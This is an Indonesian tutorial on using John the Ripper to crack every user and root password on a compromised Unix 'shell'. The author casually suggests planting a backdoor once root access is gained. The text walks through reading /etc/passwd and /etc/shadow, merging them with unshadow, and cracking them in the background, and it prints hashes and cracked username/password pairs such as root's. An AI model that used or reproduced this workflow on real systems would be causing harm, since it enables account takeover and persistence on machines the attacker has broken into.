Tutorial John The Ripper Kita akan menggunakan cara kuno untuk mendapatkan password root dan seluruh password user yang ada di sebuah shell, disini penulis menggunakan Paman John Versi 1.6 untuk Unix, kalian bisa mendownload nya di: http://www.openwall.com/john/dl/john-1.6.tar.gz nah sekarang kita buka ke shell ( penulis menganggap kalian sudah memiliki shell) kalo kalian ingin praktis, saat kalian nge-root dan sudah mendapatkan access root terserah kalian mo pasang backdoor, atau mengupload passwd dan shadow untuk dicrack biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow sekarang go to the point : [root@localhost tmp]# wget http://www.openwall.com/john/dl/john-1.6.tar.gz [root@localhost tmp]# ls -a . radsess.13217 radsess.15352 radsess.26504 .. radsess.13221 radsess.15377 radsess.26508 .bash_history radsess.13252 radsess.15505 radsess.26516 .bash_logout radsess.13257 radsess.15509 radsess.26520 .bash_profile radsess.13261 radsess.15510 radsess.29908 .bashrc radsess.13262 radsess.15517 radsess.29909 .emacs radsess.13269 radsess.15521 radsess.29935 .gtkrc radsess.13273 radsess.15525 radsess.29940 .kde radsess.13277 radsess.15627 radsess.29946 .screenrc radsess.13278 radsess.15631 radsess.30573 .webmin radsess.13287 radsess.15632 radsess.30577 john-1.6.tar.gz radsess.13291 radsess.15661 radsess.30578 makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585 [root@localhost tmp]# tar -zxvf john-1.6.tar.gz john-1.6/src/AFS_fmt.c john-1.6/src/BF_fmt.c john-1.6/src/BF_std.c john-1.6/src/BSDI_fmt.c john-1.6/src/DES_bs.c ... ... ... john-1.6/doc/OPTIONS john-1.6/doc/README john-1.6/doc/RULES john-1.6/README udah selesai dicompile kita cek, folder paman john kita yang tercinta :) [root@localhost tmp]# ls -a [root@localhost tmp]# ls -a . radsess.13213 radsess.15348 radsess.26500 .. radsess.13217 radsess.15352 radsess.26504 .bash_history radsess.13221 radsess.15377 radsess.26508 .bash_logout radsess.13252 radsess.15505 radsess.26516 .bash_profile radsess.13257 radsess.15509 radsess.26520 .bashrc radsess.13261 radsess.15510 radsess.29908 .emacs radsess.13262 radsess.15517 radsess.29909 .gtkrc radsess.13269 radsess.15521 radsess.29935 .kde radsess.13273 radsess.15525 radsess.29940 .screenrc radsess.13277 radsess.15627 radsess.29946 .webmin radsess.13278 radsess.15631 radsess.30573 john-1.6 radsess.13287 radsess.15632 radsess.30577 john-1.6.tar.gz radsess.13291 radsess.15661 radsess.30578 makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585 [root@localhost tmp]# cd john-1.6 setelah kita masuk...kita langsung cari folder src [root@localhost john-1.6]# ls -a . .. README doc run src [root@localhost tmp]# cd src [root@localhost tmp]# ls -a [root@localhost tmp]# . alpha.h formats.h mips32.h single.c .. batch.c getopt.c mips64.h single.h AFS_fmt.c batch.h getopt.h misc.c sparc.S ......... ......... Makefile detect.c math.c rules.c x86-mmx.h Makefile.dep external.c math.h rules.h x86.S alpha-4k.h external.h memory.c signals.c alpha.S formats.c memory.h signals.h kita compile dulu, dan liat jenis mesin yang ada [root@localhost src]# make To build John the Ripper, type: make SYSTEM where SYSTEM can be one of the following: linux-x86-any-elf Linux, x86, ELF binaries linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries .... .... win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX win32-cygwin-x86-k6 Win32, Cygwin, AMD K6 generic Any other UNIX system with gcc [root@localhost src]# make generic rm -f arch.h gcc -c -Wall -O2 -fomit-frame-pointer detect.c gcc -s detect.o -o detect ./best.sh "make" \ "DES_fmt.o DES_std.o" \ "MD5_std.o" \ "BF_std.o" Compiling: DES benchmark (code version #1) make[1]: Entering directory `/tmp/john-1.6/src' gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c sed "s/unsigned long/ARCH_WORD/" nonstd.c > DES_bs_s.c ... ... sampai muncul kata /run/unshadow sampai muncul kata /run/unique sampai muncul kata /run/unafs ...pokonya gitu lah..pasti tau dong kalo selesai compile kaya apa :)) abis itu kita menuju ke folder run di direktory paman john [root@localhost src]# cd .. [root@localhost john-1.6]# cd run [root@localhost run]# ls -a . digits.chr lanman.chr unshadow .. john mailer unafs alpha.chr john.pot passwd.1st unique kaya gitu lah kira2 munculnya :)) setelah itu kita cari letak passwd dan shadow [root@localhost run]# whereis passwd passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD /usr/share/man/man1/passwd.1.gz /usr/share/man/man5/passwd.5.gz tuh ada tuh /etc/passwd kemudian gunakan cara yang sama utk shadow :)~ penulis telah mencoba beberapa shell dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow passwd emang bisa diread oleh siapa saja, sedang shadow tidak bisa..diperlukan access root untuk mengambil 2 data tersebut, sebab passwd dan shadow di encryptsi nah sekang kita masuk ke tahap untuk mendecrypt password, alias CRACK PASSWORD [root@localhost run]# ./unshadow /etc/passwd /etc/shadow > passwd.1 maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama passwd.1 [root@localhost run]# cat passwd.1 root:$1$ÚÍA5öwMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin:/sbin/nologin daemon:*:2:2:daemon:/sbin:/sbin/nologin adm:*:3:4:adm:/var/adm:/sbin/nologin lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin .... johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500::/home/chrisl:/bin/bash turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:500::/home/williams:/bin/bash Setelah itu kita jalankan berbagai macam perintah Paman John contohnya : 1. menggunakan -i:alpha [root@localhost run]# ./john -i:alpha passwd.1 & maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin aja selama paman john mengcrack password untuk kita, kita bisa ngeroot :P ntar dia muncul kaya gini kalo berhasil [root@localhost run]# ./john -i:alpha passwd.1 & Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K]) watson (root) johnl (summer) 2. menggunakan -single <== kita menggunakan paman john secara powerfull emang agak lambat tapi dia secara teliti mengeck passwordnya :)) [root@localhost run]# /john -single passwd.2 3. kita ingin mengecrack password root / user saja [root@localhost run]# ./john -i:alpha -user:0 passwd.1 atau [root@localhost run]# ./john -i:alpha -user:500 passwd.1 untuk mengecek hasil password yang kita crack, dapat menggunakan [root@localhost run]# ./john -show passwd.1 [root@localhost run]# ./john -show passwd.3 root:watson:0:0:root:/root:/bin/bash coda:tools:500:500:CODA Manager:/home/coda:/bin/bash adam:myrtle:501:500::/home/adam:/bin/bash herschel:chester:502:500::/home/herschel:/bin/bash johnl:summer:504:500::/home/johnl:/bin/bash chrisl:turtle:505:500::/home/chrisl:/bin/bash turner:account:506:506::/home/turner:/bin/bash williams:ronald:507:500::/home/williams:/bin/bash 8 passwords cracked, 1 left artinya user root memiliki password watson user coda memiliki password tools user adam memiliki password myrtle masih banyak yang lain sih silahkan baca2 di README nya aja ok :)) ini hanya saya tulis ulang...jadi jika ada yang salah mohon dimaafkan